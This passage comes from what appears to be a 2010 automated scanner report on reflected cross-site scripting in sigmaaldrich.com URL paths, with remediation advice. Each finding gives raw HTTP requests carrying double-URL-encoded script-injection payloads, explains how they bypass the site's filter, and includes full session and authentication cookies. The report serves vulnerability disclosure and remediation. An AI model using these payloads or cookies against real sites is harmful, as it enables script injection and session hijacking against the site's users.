Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:26 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentaaf93";alert(1)//d613d4dcd48/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam","E404") ;
   </script>
...[SNIP]...

1.233. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9e32%2522%253balert%25281%2529%252f%252f2a81cf996cb was submitted in the REST URL parameter 2. This input was echoed as e9e32";alert(1)//2a81cf996cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldriche9e32%2522%253balert%25281%2529%252f%252f2a81cf996cb/the-americas/united-states/jai-nagarkatti-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:28 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldriche9e32";alert(1)//2a81cf996cb/the-americas/united-states/jai-nagarkatti-memoriam","E404") ;
   </script>
...[SNIP]...

1.234. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c374d%2522%253balert%25281%2529%252f%252f290bcd61e98 was submitted in the REST URL parameter 3. This input was echoed as c374d";alert(1)//290bcd61e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americasc374d%2522%253balert%25281%2529%252f%252f290bcd61e98/united-states/jai-nagarkatti-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:29 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americasc374d";alert(1)//290bcd61e98/united-states/jai-nagarkatti-memoriam","E404") ;
   </script>
...[SNIP]...

1.235. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 479f7%2522%253balert%25281%2529%252f%252f24dcf70337a was submitted in the REST URL parameter 4. This input was echoed as 479f7";alert(1)//24dcf70337a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be written out as an escaped JavaScript string literal (with ", \ and </ encoded) rather than concatenated raw. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-states479f7%2522%253balert%25281%2529%252f%252f24dcf70337a/jai-nagarkatti-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:31 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-states479f7";alert(1)//24dcf70337a/jai-nagarkatti-memoriam","E404") ;
   </script>
...[SNIP]...

1.236. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string literal delimited by double quotation marks. The payload 257c5%2522%253balert%25281%2529%252f%252f91b0ff44e5 was submitted in REST URL parameter 5 and was echoed as 257c5";alert(1)//91b0ff44e5 in the application's response. In that position the " closes the string literal, the ; ends the statement, alert(1) runs, and // comments out the rest of the original line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server decodes %253c to %3c, which passes the filter, and a second decode inside the application turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be written out as an escaped JavaScript string literal (with ", \ and </ encoded) rather than concatenated raw. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam257c5%2522%253balert%25281%2529%252f%252f91b0ff44e5 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:33 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam257c5";alert(1)//91b0ff44e5","E404") ;
   </script>
...[SNIP]...

1.237. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/ordering [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/ordering

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string literal delimited by double quotation marks. The payload 2626f%2522%253balert%25281%2529%252f%252fd734e82c357 was submitted in REST URL parameter 1 and was echoed as 2626f";alert(1)//d734e82c357 in the application's response. In that position the " closes the string literal, the ; ends the statement, alert(1) runs, and // comments out the rest of the original line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server decodes %253c to %3c, which passes the filter, and a second decode inside the application turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be written out as an escaped JavaScript string literal (with ", \ and </ encoded) rather than concatenated raw. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content2626f%2522%253balert%25281%2529%252f%252fd734e82c357/sigma-aldrich/the-americas/united-states/ordering HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
